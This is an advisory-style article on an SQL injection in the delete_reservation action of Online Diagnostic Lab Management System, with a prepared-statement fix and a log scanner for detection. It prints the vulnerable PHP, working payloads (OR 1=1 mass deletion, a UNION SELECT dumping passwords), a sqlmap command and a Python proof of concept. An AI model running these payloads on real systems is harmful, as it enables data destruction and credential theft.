Published: 2024-06
Severity: HIGH
If you’re managing medical labs with the Online Diagnostic Lab Management System v1., you should know about a critical vulnerability found in 2022: CVE-2022-43068. Attackers can exploit this SQL injection flaw through a simple browser or basic tools, possibly gaining access to sensitive patient data or taking over your database. Let’s break down how it works, show the vulnerable code, and discuss how attackers might exploit it (with proof-of-concept snippets). This guide is written simply, for regular admins and developers, with no security jargon.
- Target: Online Diagnostic Lab Management System v1.
- Vulnerable Script: /classes/Master.php
- Action: An attacker can send crafted SQL in the id parameter when deleting a reservation.
- Possible Impact: Read/delete/modify all data, dump user passwords, destroy the application.
The dangerous URL looks like this:
http://YOUR-LAB-SITE/classes/Master.php?f=delete_reservation&id=1
The key issue? The id parameter is used directly in SQL with NO validation or protection.
Here’s typical vulnerable code in Master.php (simplified):
if ($_GET['f'] == "delete_reservation") {
    $id = $_GET['id'];
    // VULNERABLE LINE: Injects $id directly into the query
    $sql = "DELETE FROM reservations WHERE id = $id";
    $result = $conn->query($sql);
    if ($result) {
        echo "Reservation deleted";
    } else {
        echo "Failed";
    }
}
What’s wrong?
There is NO protection! Whatever the attacker puts in id is passed straight into the SQL statement.
Let’s say an attacker wants to hit every reservation instead of deleting just one:
http://YOUR-LAB-SITE/classes/Master.php?f=delete_reservation&id=1 OR 1=1
This changes the SQL to:
DELETE FROM reservations WHERE id = 1 OR 1=1
Result? ALL reservations are deleted (because 1=1 always matches).
Attackers can use SQL UNION to get data from another table (like users):
http://YOUR-LAB-SITE/classes/Master.php?f=delete_reservation&id=-1 UNION SELECT 1, username, password FROM users --
If query output or database error messages are shown to the user, attackers can see usernames and password hashes.
Automated Exploitation with sqlmap
The tool sqlmap automates finding and exploiting SQL injection.
Command example:
sqlmap -u "http://YOUR-LAB-SITE/classes/Master.php?f=delete_reservation&id=1" --dbs
This runs its tests and lists ALL databases on your server.
Proof-of-Concept Python Exploit
Below is a simple Python script demonstrating how one might test the vulnerability (for educational purposes only!):
import requests

base_url = "http://YOUR-LAB-SITE/classes/Master.php?f=delete_reservation&id="
payload = "1 OR 1=1"
full_url = base_url + payload
r = requests.get(full_url)
print(r.text)
Better PHP Example
The fix is to cast the id to an integer and bind it as a parameter of a prepared statement, so the value is always treated as data and never parsed as SQL:
if ($_GET['f'] == "delete_reservation") {
    // Cast first: a non-numeric value becomes 0 (or only its leading digits)
    $id = intval($_GET['id']);
    // Prepared statement: the bound value can never change the query structure
    $stmt = $conn->prepare("DELETE FROM reservations WHERE id = ?");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    if ($stmt->affected_rows > 0) {
        echo "Reservation deleted";
    } else {
        echo "Failed";
    }
    $stmt->close();
}
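To make the defensive side concrete, here is an added Python example; it is not code from the article, from the Online Diagnostic Lab Management System project, or from sqlmap. It does two things the hardened handler above implies. `is_valid_reservation_id` applies the strict rule the prepared-statement fix relies on, accepting only a plain decimal integer instead of silently truncating input the way PHP's intval does (intval("1 OR 1=1") is 1). `scan_access_log` then runs that rule over a few constructed Apache-style access-log lines so an admin can find past requests to delete_reservation whose id was not a number, which is how the payloads shown earlier look once a browser or tool has URL-encoded them. The function names, the common-log-format layout, the IP addresses, timestamps and log lines are all constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache common-log-format lines (assumption: this is the log layout
# of the web server in front of the application). IPs and timestamps are made up.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Jun/2024:08:15:00 +0000] "GET /classes/Master.php?f=delete_reservation&id=12 HTTP/1.1" 200 21',
    '203.0.113.10 - - [10/Jun/2024:08:15:07 +0000] "GET /classes/Master.php?f=delete_reservation&id=1%20OR%201%3D1 HTTP/1.1" 200 21',
    '198.51.100.7 - - [10/Jun/2024:08:16:30 +0000] "GET /classes/Master.php?f=delete_reservation&id=-1%20UNION%20SELECT%201,username,password%20FROM%20users%20-- HTTP/1.1" 200 144',
    '198.51.100.7 - - [10/Jun/2024:08:17:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120',
]

# Request line of a common-log-format entry: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Path of the vulnerable script and the action name, both taken from the advisory.
VULNERABLE_PATH = "/classes/Master.php"
VULNERABLE_ACTION = "delete_reservation"


def is_valid_reservation_id(raw):
    """True only for a plain decimal integer (1 to 10 digits, surrounding whitespace ignored).

    Unlike PHP's intval(), anything else is rejected outright rather than
    truncated, so 'OR', 'UNION', quotes and comment markers can never pass.
    """
    if raw is None:
        return False
    return re.fullmatch(r"[0-9]{1,10}", raw.strip()) is not None


def parse_reservation_id(raw):
    """Return the id as an int, or raise ValueError so the caller can log and refuse."""
    if not is_valid_reservation_id(raw):
        raise ValueError("rejected reservation id: %r" % (raw,))
    return int(raw.strip())


def scan_access_log(lines):
    """Return (client_ip, decoded_id) for each delete_reservation request whose id is not a plain integer."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(VULNERABLE_PATH):
            continue
        # parse_qs decodes %20, %3D and '+' so we see the id exactly as PHP's $_GET would
        qs = parse_qs(parts.query, keep_blank_values=True)
        if qs.get("f") != [VULNERABLE_ACTION]:
            continue
        for raw_id in qs.get("id", [""]):
            if not is_valid_reservation_id(raw_id):
                hits.append((m.group("ip"), raw_id))
    return hits


if __name__ == "__main__":
    for ip, bad_id in scan_access_log(SAMPLE_LOG):
        print("suspicious delete_reservation request from %s: id=%r" % (ip, bad_id))
```

Run as a script it prints the two suspicious requests; on a real server, feed it the web server's access log instead of `SAMPLE_LOG`. Because `parse_qs` decodes the query string the same way PHP does, the scanner flags the encoded forms (`%20`, `%3D`, `+`) that never appear literally in the advisory's URLs but are what actually lands in the log.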
References
- NVD: CVE-2022-43068
- Exploit-DB advisory
- Online Diagnostic Lab Management System v1. on SourceForge
Final Thoughts
If you’re running Online Diagnostic Lab Management System v1., patch this now. Until you fix it, you’re a sitting duck for anyone who can reach your website. If you’re unsure how to update, ask a developer for help or consider switching to a more secure platform.
Stay alert: SQL injection is still one of the top ways attackers break into web apps. Always validate incoming data, and use prepared statements for every query that includes user input!
Disclaimer: All code and methods in this article are for educational purposes only. Do not exploit vulnerabilities on systems you do not own or have explicit permission to test.
Timeline
Published on: 11/02/2022 20:15:00 UTC
Last modified on: 11/03/2022 03:21:00 UTC